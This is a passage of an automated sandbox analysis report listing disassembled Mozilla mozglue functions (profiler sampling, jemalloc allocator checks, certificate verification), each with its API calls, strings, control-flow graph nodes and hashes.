                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8,?,?,00000000), ref: 6C9AB852
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AB884
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C9AB8D2
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?), ref: 6C9AB9FD
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9ABA05
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8,?,?,00000000), ref: 6C9ABA12
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,00000000), ref: 6C9ABA27
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9ABA4B
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9AC9C7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9AC9DC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] Stack sample too big for profiler storage, needed %u bytes, xrefs: 6C9AC878
                                                                                                                                                                                                                                                                                        • [I %d/%d] Stack sample too big for local storage, needed %u bytes, xrefs: 6C9AC7DA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                                                                                                                                        • String ID: [I %d/%d] Stack sample too big for local storage, needed %u bytes$[I %d/%d] Stack sample too big for profiler storage, needed %u bytes
                                                                                                                                                                                                                                                                                        • API String ID: 656605770-2789026554
                                                                                                                                                                                                                                                                                        • Opcode ID: f5b7214ab645276e4a62ec91b579ad8212c196e309d00aadb38aa1de3c94d5ae
                                                                                                                                                                                                                                                                                        • Instruction ID: 941c25c8e9042e80faf93ac8eb2877bb6ab7594e7481a5d641d1f3cd4bd4df41
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5b7214ab645276e4a62ec91b579ad8212c196e309d00aadb38aa1de3c94d5ae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38A2AD71A087808FD725CF68C48079BB7F5BFD9318F144A2DE89997750DB31E9498B82
                                                                                                                                                                                                                                                                                        Function 6C976C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1474 6c976c80-6c976cd4 CryptQueryObject 1475 6c976e53-6c976e5d 1474->1475 1476 6c976cda-6c976cf7 1474->1476 1479 6c976e63-6c976e7e 1475->1479 1480 6c9773a2-6c9773ae 1475->1480 1477 6c97733e-6c977384 call 6c9cc110 1476->1477 1478 6c976cfd-6c976d19 CryptMsgGetParam 1476->1478 1477->1478 1499 6c97738a 1477->1499 1482 6c9771c4-6c9771cd 1478->1482 1483 6c976d1f-6c976d61 moz_xmalloc memset CryptMsgGetParam 1478->1483 1486 6c9771e5-6c9771f9 call 6c99ab89 1479->1486 1487 6c976e84-6c976e8c 1479->1487 1484 6c9773b4-6c977422 memset VerSetConditionMask * 4 VerifyVersionInfoW 1480->1484 1485 6c97760f-6c97762a 1480->1485 1489 6c976d63-6c976d79 CertFindCertificateInStore 1483->1489 1490 6c976d7f-6c976d90 free 1483->1490 1491 6c977604-6c977609 1484->1491 1492 6c977428-6c977439 1484->1492 1495 6c9777d7-6c9777eb call 6c99ab89 1485->1495 1496 6c977630-6c97763e 1485->1496 1486->1487 1511 6c9771ff-6c977211 call 6c9a0080 call 6c99ab3f 1486->1511 1493 6c977656-6c977660 1487->1493 1494 6c976e92-6c976ecb 1487->1494 1489->1490 1500 6c976d96-6c976d98 1490->1500 1501 6c97731a-6c977325 1490->1501 1491->1485 1505 6c977440-6c977454 1492->1505 1510 6c97766f-6c9776c5 1493->1510 1494->1493 1538 6c976ed1-6c976f0e CreateFileW 1494->1538 1495->1496 1515 6c9777f1-6c977803 call 6c9cc240 call 6c99ab3f 1495->1515 1496->1493 1502 6c977640-6c977650 1496->1502 1499->1482 1500->1501 1506 6c976d9e-6c976da0 1500->1506 1508 6c97732b 1501->1508 1509 6c976e0a-6c976e10 CertFreeCertificateContext 1501->1509 1502->1493 1523 6c97745b-6c977476 1505->1523 1506->1501 1516 6c976da6-6c976dc9 CertGetNameStringW 1506->1516 1518 6c976e16-6c976e24 1508->1518 1509->1518 1512 6c977763-6c977769 1510->1512 1513 6c9776cb-6c9776d5 1510->1513 1511->1487 1519 6c97776f-6c9777a1 call 6c9cc110 1512->1519 1513->1519 1520 6c9776db-6c977749 memset VerSetConditionMask * 4 VerifyVersionInfoW 1513->1520 1515->1496 1524 6c977330-6c977339 1516->1524 1525 6c976dcf-6c976e08 moz_xmalloc memset CertGetNameStringW 1516->1525 1527 6c976e26-6c976e27 CryptMsgClose 1518->1527 1528 6c976e2d-6c976e2f 1518->1528 1549 6c9775ab-6c9775b4 free 1519->1549 1531 6c97774b-6c977756 1520->1531 1532 6c977758-6c97775d 1520->1532 1536 6c9777a6-6c9777ba call 6c99ab89 1523->1536 1537 6c97747c-6c977484 1523->1537 1524->1509 1525->1509 1527->1528 1529 6c976e31-6c976e34 CertCloseStore 1528->1529 1530 6c976e3a-6c976e50 call 6c99b320 1528->1530 1529->1530 1531->1519 1532->1512 1536->1537 1555 6c9777c0-6c9777d2 call 6c9cc290 call 6c99ab3f 1536->1555 1544 6c9775bf-6c9775cb 1537->1544 1545 6c97748a-6c9774a6 1537->1545 1538->1505 1546 6c976f14-6c976f39 1538->1546 1553 6c9775da-6c9775f9 GetLastError 1544->1553 1545->1553 1568 6c9774ac-6c9774e5 moz_xmalloc memset 1545->1568 1551 6c977216-6c97722a call 6c99ab89 1546->1551 1552 6c976f3f-6c976f47 1546->1552 1549->1544 1551->1552 1566 6c977230-6c977242 call 6c9a00d0 call 6c99ab3f 1551->1566 1552->1523 1557 6c976f4d-6c976f70 1552->1557 1558 6c977167-6c977173 1553->1558 1559 6c9775ff 1553->1559 1555->1537 1579 6c976f76-6c976fbd moz_xmalloc memset 1557->1579 1580 6c9774eb-6c97750a GetLastError 1557->1580 1564 6c977175-6c977176 CloseHandle 1558->1564 1565 6c97717c-6c977184 1558->1565 1559->1491 1564->1565 1569 6c977186-6c9771a1 1565->1569 1570 6c9771bc-6c9771be 1565->1570 1566->1552 1568->1580 1574 6c977247-6c97725b call 6c99ab89 1569->1574 1575 6c9771a7-6c9771af 1569->1575 1570->1478 1570->1482 1574->1575 1589 6c977261-6c977273 call 6c9a01c0 call 6c99ab3f 1574->1589 1575->1570 1581 6c9771b1-6c9771b9 1575->1581 1594 6c976fc3-6c976fde 1579->1594 1595 6c9771d2-6c9771e0 1579->1595 1580->1579 1584 6c977510 1580->1584 1581->1570 1584->1558 1589->1575 1597 6c976fe4-6c976feb 1594->1597 1598 6c977278-6c97728c call 6c99ab89 1594->1598 1599 6c97714d-6c977161 free 1595->1599 1601 6c976ff1-6c97700c 1597->1601 1602 6c97738f-6c97739d 1597->1602 1598->1597 1606 6c977292-6c9772a4 call 6c9a0120 call 6c99ab3f 1598->1606 1599->1558 1604 6c977012-6c977019 1601->1604 1605 6c9772a9-6c9772bd call 6c99ab89 1601->1605 1602->1599 1604->1602 1607 6c97701f-6c97704d 1604->1607 1605->1604 1613 6c9772c3-6c9772e4 call 6c9a0030 call 6c99ab3f 1605->1613 1606->1597 1607->1595 1619 6c977053-6c97707a 1607->1619 1613->1604 1621 6c977080-6c977088 1619->1621 1622 6c9772e9-6c9772fd call 6c99ab89 1619->1622 1624 6c977515 1621->1624 1625 6c97708e-6c9770c6 memset 1621->1625 1622->1621 1630 6c977303-6c977315 call 6c9a0170 call 6c99ab3f 1622->1630 1628 6c977517-6c977521 1624->1628 1632 6c977528-6c977534 1625->1632 1635 6c9770cc-6c97710b CryptQueryObject 1625->1635 1628->1632 1630->1621 1637 6c97753b-6c97758d moz_xmalloc memset CryptBinaryToStringW 1632->1637 1635->1628 1638 6c977111-6c97712a 1635->1638 1640 6c97758f-6c9775a3 _wcsupr_s 1637->1640 1641 6c9775a9 1637->1641 1638->1637 1642 6c977130-6c97714a 1638->1642 1640->1510 1640->1641 1641->1549 1642->1599
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C976CCC
                                                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C976D11
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C976D26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C976D35
                                                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C976D53
                                                                                                                                                                                                                                                                                        • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C976D73
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C976D80
                                                                                                                                                                                                                                                                                        • CertGetNameStringW.CRYPT32 ref: 6C976DC0
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C976DDC
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C976DEB
                                                                                                                                                                                                                                                                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C976DFF
                                                                                                                                                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C976E10
                                                                                                                                                                                                                                                                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C976E27
                                                                                                                                                                                                                                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C976E34
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C976EF9
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C976F7D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C976F8C
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C97709D
                                                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C977103
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C977153
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C977176
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C977209
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C97723A
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C97726B
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C97729C
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9772DC
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C97730D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9773C2
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9773F3
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9773FF
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C977406
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C97740D
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C97741A
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C97755A
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C977568
                                                                                                                                                                                                                                                                                        • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C977585
                                                                                                                                                                                                                                                                                        • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C977598
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C9775AC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: EnterCriticalSection.KERNEL32(6C9EE370,?,?,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284), ref: 6C99AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99ABD1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                                        • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                                        • Opcode ID: ea24c88d8f40be00d52862190dfc54b9a462434c8b4df7fb11725c311560ca7f
                                                                                                                                                                                                                                                                                        • Instruction ID: c8531e7d4a1b38238bc72e299c8d1a330e14b739cc290aa3688ded5a6a392051
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea24c88d8f40be00d52862190dfc54b9a462434c8b4df7fb11725c311560ca7f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B52D671A053149BEB62DF24CC84BAA77BCEF69708F144199E509A7640DB70EF84CFA1
                                                                                                                                                                                                                                                                                        Function 6C996FF0 Relevance: 89.1, APIs: 39, Strings: 10, Instructions: 3347COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7DC), ref: 6C997019
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7DC), ref: 6C997061
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C9971A4
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C99721D
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C99723E
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C99726C
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6C9972B2
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C99733F
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0000000C), ref: 6C9973E8
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C99961C
                                                                                                                                                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C999622
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C999642
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C99964F
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9996CE
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9996DB
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EE804), ref: 6C999747
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C999792
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9997A5
                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C9EE810,00000040), ref: 6C9997CF
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EE7B8,00001388), ref: 6C999838
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EE744,00001388), ref: 6C99984E
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EE784,00001388), ref: 6C999874
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EE7DC,00001388), ref: 6C999895
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C999993
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9999D2
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9999A8
                                                                                                                                                                                                                                                                                        • MOZ_CRASH(), xrefs: 6C999B42
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C999933, 6C999A33, 6C999A4E
                                                                                                                                                                                                                                                                                        • <jemalloc>, xrefs: 6C999B33, 6C999BE3
                                                                                                                                                                                                                                                                                        • : (malloc) Unsupported character in malloc options: ', xrefs: 6C999BF4
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9999BD
                                                                                                                                                                                                                                                                                        • MALLOC_OPTIONS, xrefs: 6C9997CA
                                                                                                                                                                                                                                                                                        • Compile-time page size does not divide the runtime one., xrefs: 6C999B38
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 4047164644-4173974723
                                                                                                                                                                                                                                                                                        • Opcode ID: 0f2a88c4fbcbc365681c0b84ac4399d86df3a31de8b49aa8f0647872b79cd4a6
                                                                                                                                                                                                                                                                                        • Instruction ID: c0e1ffa2d808ca2ed9fe2b3239c90870cbed51e3ade60e2836a50fb0a2951bfc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f2a88c4fbcbc365681c0b84ac4399d86df3a31de8b49aa8f0647872b79cd4a6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C538E71A097018FD718CF29C580615FBE5BF8A328F2DC6ADE8698B791D771E841CB81
                                                                                                                                                                                                                                                                                        Function 6C9A0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C9A0F1F
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C9A0F99
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C9A0FB7
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C9A0FE9
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C9A1031
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C9A10D0
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C9A117D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,?), ref: 6C9A1C39
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE744), ref: 6C9A3391
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE744), ref: 6C9A33CD
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C9A3431
                                                                                                                                                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9A3437
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C9A3793
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9A37D2
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9A37A8
                                                                                                                                                                                                                                                                                        • MOZ_CRASH(), xrefs: 6C9A3950
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9A3559, 6C9A382D, 6C9A3848
                                                                                                                                                                                                                                                                                        • <jemalloc>, xrefs: 6C9A3941, 6C9A39F1
                                                                                                                                                                                                                                                                                        • : (malloc) Unsupported character in malloc options: ', xrefs: 6C9A3A02
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9A37BD
                                                                                                                                                                                                                                                                                        • MALLOC_OPTIONS, xrefs: 6C9A35FE
                                                                                                                                                                                                                                                                                        • Compile-time page size does not divide the runtime one., xrefs: 6C9A3946
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 3040639385-4173974723
                                                                                                                                                                                                                                                                                        • Opcode ID: 5529607a8d8549e600ff2f9e2e032367c3b9deb1326f438171aaceec01c30f69
                                                                                                                                                                                                                                                                                        • Instruction ID: e12d35ac7dbca415c34af0225532d300500224f184059f072eae92feaba45c07
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5529607a8d8549e600ff2f9e2e032367c3b9deb1326f438171aaceec01c30f69
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62539D71A05B01CFD304CF69C540615FBE5BF8A328F29C6ADE8699BB91D771E842CB81
                                                                                                                                                                                                                                                                                        Function 6C9C55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
